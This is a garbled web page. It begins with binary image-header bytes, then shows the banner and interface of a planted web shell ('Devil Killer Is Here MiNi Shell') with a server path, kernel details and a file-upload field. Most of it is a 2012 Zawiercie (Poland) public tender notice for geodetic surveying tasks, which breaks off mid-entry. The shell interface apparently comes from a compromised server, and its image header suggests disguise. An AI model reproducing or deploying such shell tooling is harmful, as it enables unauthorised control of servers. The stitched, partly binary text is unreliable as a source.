JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120309/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120309/55913-N-2012.html

<p class="kh_header"><b>Zawiercie: Wykonanie prac geodezyjnych w zakresie 10 zadań.</b><br>
<b>Numer ogłoszenia: 55913 - 2012; data zamieszczenia: 09.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Zawiercie , ul. Leśna 2, 42-400 Zawiercie, woj. śląskie, tel. 032 6722684, faks 032 6721513.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.zawiercie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie prac geodezyjnych w zakresie 10 zadań..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie n/w prac geodezyjnych:
Zadanie (część) nr 1
Podział nieruchomości w celu utworzenia 2 działek wraz z opracowaniem wstępnego projektu podziału oraz stabilizacją na gruncie  nowych punktów granicznych.
Przewidywana ilość nieruchomości podlegających podziałowi (zadań/zleceń): 10 
Minimalna ilość zadań/zleceń - 3
Zadanie (część) nr 2
Podział nieruchomości w celu utworzenia 3-5 działek wraz z opracowaniem wstępnego projektu podziału oraz stabilizacją na gruncie  nowych punktów granicznych.
Przewidywana ilość nieruchomości podlegających podziałowi (zadań/zleceń): 2
Minimalna ilość zadań/zleceń - 1
Zadanie (część) nr 3
Podział nieruchomości na dwie działki  w celu wydzielenia części nieruchomości przeznaczonej na poszerzenie dróg wraz z opracowaniem wstępnego projektu podziału oraz stabilizacją na gruncie  nowych punktów granicznych.
Przewidywana ilość działek podlegających podziałowi (zadań/zleceń): 90 
Minimalna ilość zleconych zadań/zleceń - 50
Zadanie (część) nr 4
Wznowienie znaków granicznych.
Przewidywana ilość znaków: 200
Minimalna ilość znaków: 150
Zadanie (część) nr 5
Sporządzenie wykazu  danych ewidencyjnych dot. działki w zakresie oznaczenia użytku gruntowego.
Przewidywana ilość wykazów (zadań/zleceń): 15
Minimalna ilość zadań/zleceń: 2
Zadanie (część) nr 6 
Sporządzenie dokumentów geodezyjnych składających się z map i wykazów zmian do zasiedzenia nieruchomości oznaczonych numerami ew.:52/24,59/1,52/14 k.m.50, 20/1,20/3, k.m.52, 28/1,28/2 k.m.60 o łącznej powierzchni  1,3095 ha stanowiących ulicę Żabią obręb Zawiercie w trybie postępowania sądowego.
Zadanie (część) nr 7 
Sporządzenie dokumentów geodezyjnych składających się z mapy i wykazu zmian do zasiedzenia nieruchomości w trybie postępowania sądowego.
Przewidywana ilość działek do zasiedzenia (zadań/zleceń): 4
Minimalna ilość zadań/zleceń: 2
Zadanie (część) nr 8
Sporządzenie dokumentacji geodezyjnej składającej się z map  i wykazów zmian polegającej na połączeniu 3 działek ewidencyjnych w jedną nieruchomość.
Zadanie (część) nr 9
Opracowanie dokumentacji geodezyjnej umożliwiającej wprowadzenie zmian w operacie ewidencji gruntów i budynków oraz dokonanie odpowiednich wpisów w księdze wieczystej w celu doprowadzenia oznaczenia działki ewidencyjnej nr 1717 położonej w obrębie Marciszów k.m,9, do wymogów zawartych w § 9 pkt 4 Rozporządzenia Ministra Rozwoju Regionalnego i Budownictwa z  dnia 29.03.2001r w sprawie ewidencji gruntów i budynków (Dz. U z 2001r. Nr 38, poz. 454).
Zadanie (część) nr 10
Opracowanie dokumentacji geodezyjnej umożliwiającej wprowadzenie zmian w operacie ewidencji gruntów i budynków oraz dokonanie odpowiednich wpisów w księdze wieczystej w celu doprowadzenia oznaczenia działki ewidencyjnej nr 1714/3 położonej w obrębie Marciszów k.m,9, do wymogów zawartych w § 9 pkt 4 Rozporządzenia Ministra Rozwoju Regionalnego i Budownictwa z dnia 29.03.2001r w sprawie ewidencji gruntów i budynków (Dz. U z 2001r. Nr 38, poz.454).
Zamawiający zastrzega sobie prawo nieudzielenia zamówienia w przewidywanej ilości. Wielkość zamówienia uzależniona będzie od aktualnych potrzeb Zamawiającego.
Wszystkie etapy przedmiotu zamówienia winny być opracowane zgodnie z wymogami określonymi w obowiązujących przepisach i normach, w szczególności ustawą 
o gospodarce nieruchomościami z dnia 21 sierpnia 1997 r. (teks jednolity z 2010 r. Dz. U. Nr 102, poz. 651 z późn. zm.) i rozporządzeniem Rady Ministrów z dnia 7 grudnia 2004 r. w sprawie sposobu i trybu dokonywania podziałów nieruchomości (Dz. U. z 2004 r. 
Nr. 268 poz. 2663) oraz ustawą z dnia 17 maja 1989 r. oraz Prawo geodezyjne 
i kartograficzne (tekst jednolity z 2010 r. Dz. U. Nr 193 poz. 1287 z późn. zm.).
Wykonawca nie może powierzyć wykonania przedmiotu zamówienia podwykonawcom.
Wspólny Słownik Zamówień Publicznych (CPV):
71.33.20.00-4 - geotechniczne usługi inżynieryjne..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.33.20.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie.Wykonawca składa oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie.Wykonawca składa oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie.Wykonawca składa oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy dysponują lub będą dysponowali min. 1 osobą posiadającą uprawnienia do wykonywania samodzielnych funkcji w dziedzinie geodezji i kartografii w zakresie - rozgraniczanie i podziały nieruchomości (gruntów) oraz sporządzanie dokumentacji do celów prawnych - zadania nr 1-10. Złożenie przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu ,będzie stanowiło podstawę do oceny spełniania warunków udziału w postępowaniu. Zamawiający sprawdzi z treści tego  oświadczenia, czy Wykonawca spełnia ww. warunek. Zamawiający wymaga , aby wykonawca wykazał, nie później niż na dzień składania ofert spełnianie warunku, o którym mowa powyżej. Ocena spełniania przedstawionego powyżej warunku zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie.Wykonawca składa oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Druk Formularz oferty, sporządzony wg wzoru stanowiącego załącznik nr 3 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Z wykonawcą, który złoży najkorzystniejszą ofertę zostanie zawarta umowa, której wzór stanowi załącznik do  specyfikacji istotnych warunków zamówienia. Zamawiający przewiduje możliwość istotnych zmian postanowień umowy w przypadku, gdy:1)nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia;2)wynikną rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony;3)nastąpi przekształcenie podmiotowe Wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zawiercie.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Zawierciu, ul. Leśna 2, 42-400 Zawiercie, Wydział Zamówień Publicznych, pokój nr 202..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2012 godzina 10:00, miejsce: Urząd Miejski w Zawierciu, ul. Leśna 2 Punkt Obsługi Interesanta (Informacja), parter UM.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Termin wykonania zamówienia:Zadanie nr 1 - 4 miesiące  od daty otrzymania zlecenia;Zadanie nr 2 - 4 miesiące  od daty otrzymania zlecenia;Zadanie nr 3 - 4 miesiące  od daty otrzymania zlecenia;Zadanie nr 4 - 21 dni od daty otrzymania zlecenia;Zadanie nr 5 - 21 dni od daty otrzymania zlecenia;Zadanie nr 7 - 4 miesiące  od daty otrzymania zlecenia;
w okresie objętym zamówieniem: od dnia podpisania umowy do 30.11.2012r;
Zadanie nr 6 - 4 miesiące  od dnia podpisania umowy;Zadanie nr 8 - do dnia 30 czerwca 2012r;Zadanie nr 9 - do dnia 30 czerwca 2012r;Zadanie nr 10 - do dnia 30 czerwca 2012r. Ogłoszenie o zamówieniu zostało zamieszczone w Biuletynie Zamówień Publicznych w dniu 09.03.2012r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Podział nieruchomości w celu utworzenia 2 działek wraz z opracowaniem wstępnego projektu podziału oraz stabilizacją na gruncie  nowych punktów granicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie (część) nr 1
Podział nieruchomości w celu utworzenia 2 działek wraz z opracowaniem wstępnego projektu podziału oraz stabilizacją na gruncie  nowych punktów granicznych.
Przewidywana ilość nieruchomości podlegających podziałowi (zadań/zleceń): 10 
Minimalna ilość zadań/zleceń - 3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.33.20.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Podział nieruchomości w celu utworzenia 3-5 działek wraz z opracowaniem wstępnego projektu podziału oraz stabilizacją na gruncie  nowych punktów granicznych;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie (część) nr 2
Podział nieruchomości w celu utworzenia 3-5 działek wraz z opracowaniem wstępnego projektu podziału oraz stabilizacją na gruncie  nowych punktów granicznych.
Przewidywana ilość nieruchomości podlegających podziałowi (zadań/zleceń): 2
Minimalna ilość zadań/zleceń - 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.33.20.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Podział nieruchomości na dwie działki  w celu wydzielenia części nieruchomości przeznaczonej na poszerzenie dróg wraz z opracowaniem wstępnego projektu podziału oraz stabilizacją na gruncie nowych punktów granicznych;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie (część) nr 3
Podział nieruchomości na dwie działki  w celu wydzielenia części nieruchomości przeznaczonej na poszerzenie dróg wraz z opracowaniem wstępnego projektu podziału oraz stabilizacją na gruncie  nowych punktów granicznych.
Przewidywana ilość działek podlegających podziałowi (zadań/zleceń): 90 
Minimalna ilość zleconych zadań/zleceń - 50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.33.20.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wznowienie znaków granicznych;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie (część) nr 4
Wznowienie znaków granicznych.
Przewidywana ilość znaków: 200
Minimalna ilość znaków: 150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.33.20.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Sporządzenie wykazu  danych ewidencyjnych dot. działki w zakresie oznaczenia użytku gruntowego;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie (część) nr 5
Sporządzenie wykazu  danych ewidencyjnych dot. działki w zakresie oznaczenia użytku gruntowego.
Przewidywana ilość wykazów (zadań/zleceń): 15
Minimalna ilość zadań/zleceń: 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.33.20.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Sporządzenie dokumentów geodezyjnych składających się z map i wykazów zmian do zasiedzenia nieruchomości oznaczonych numerami ew.:52/24,59/1,52/14 k.m.50, 20/1,20/3, k.m.52, 28/1,28/2 k.m.60 o łącznej powierzchni  1,3095 ha stanowiących ulicę Żabią obręb Zawiercie w trybie postępowania sądowego;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie (część) nr 6 
Sporządzenie dokumentów geodezyjnych składających się z map i wykazów zmian do zasiedzenia nieruchomości oznaczonych numerami ew.:52/24,59/1,52/14 k.m.50, 20/1,20/3, k.m.52, 28/1,28/2 k.m.60 o łącznej powierzchni  1,3095 ha stanowiących ulicę Żabią obręb Zawiercie w trybie postępowania sądowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.33.20.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Sporządzenie dokumentów geodezyjnych składających się z mapy i wykazu zmian do zasiedzenia nieruchomości w trybie postępowania sądowego;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie (część) nr 7 
Sporządzenie dokumentów geodezyjnych składających się z mapy i wykazu zmian do zasiedzenia nieruchomości w trybie postępowania sądowego.
Przewidywana ilość działek do zasiedzenia (zadań/zleceń): 4
Minimalna ilość zadań/zleceń: 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.33.20.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Sporządzenie dokumentacji geodezyjnej składającej się z map  i wykazów zmian polegającej na połączeniu 3 działek ewidencyjnych w jedną nieruchomość;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie (część) nr 8
Sporządzenie dokumentacji geodezyjnej składającej się z map  i wykazów zmian polegającej na połączeniu 3 działek ewidencyjnych w jedną nieruchomość..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.33.20.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Opracowanie dokumentacji geodezyjnej umożliwiającej  wprowadzenie zmian w operacie ewidencji gruntów i budynków oraz dokonanie odpowiednich wpisów w księdze wieczystej 
w celu doprowadzenia oznaczenia działki ewidencyjnej nr 1717 położonej w obrębie Marciszów k.m,9, do wymogów zawartych w § 9 pkt 4 Rozporządzenia Ministra Rozwoju Regionalnego i Budownictwa z  dnia 29.03.2001r w sprawie ewidencji gruntów i budynków (Dz. U z 2001r. Nr 38, poz.454);.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie (część) nr 9
Opracowanie dokumentacji geodezyjnej umożliwiającej wprowadzenie zmian w operacie ewidencji gruntów i budynków oraz dokonanie odpowiednich wpisów w księdze wieczystej w celu doprowadzenia oznaczenia działki ewidencyjnej nr 1717 położonej w obrębie Marciszów k.m,9, do wymogów zawartych w § 9 pkt 4 Rozporządzenia Ministra Rozwoju Regionalnego i Budownictwa z  dnia 29.03.2001r w sprawie ewidencji gruntów i budynków (Dz. U z 2001r. Nr 38, poz. 454)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.33.20.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Opracowanie dokumentacji geodezyjnej umożliwiającej wprowadzenie zmian w operacie ewidencji gruntów i budynków oraz dokonanie odpowiednich wpisów w księdze wieczystej 
w celu doprowadzenia oznaczenia działki ewidencyjnej nr 1714/3 położonej w obrębie Marciszów k.m,9, do wymogów zawartych w § 9 pkt 4 Rozporządzenia Ministra Rozwoju Regionalnego i Budownictwa z dnia 29.03.2001r w sprawie ewidencji gruntów i budynków (Dz. U z 2001r. Nr 38, poz.454)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie (część) nr 10
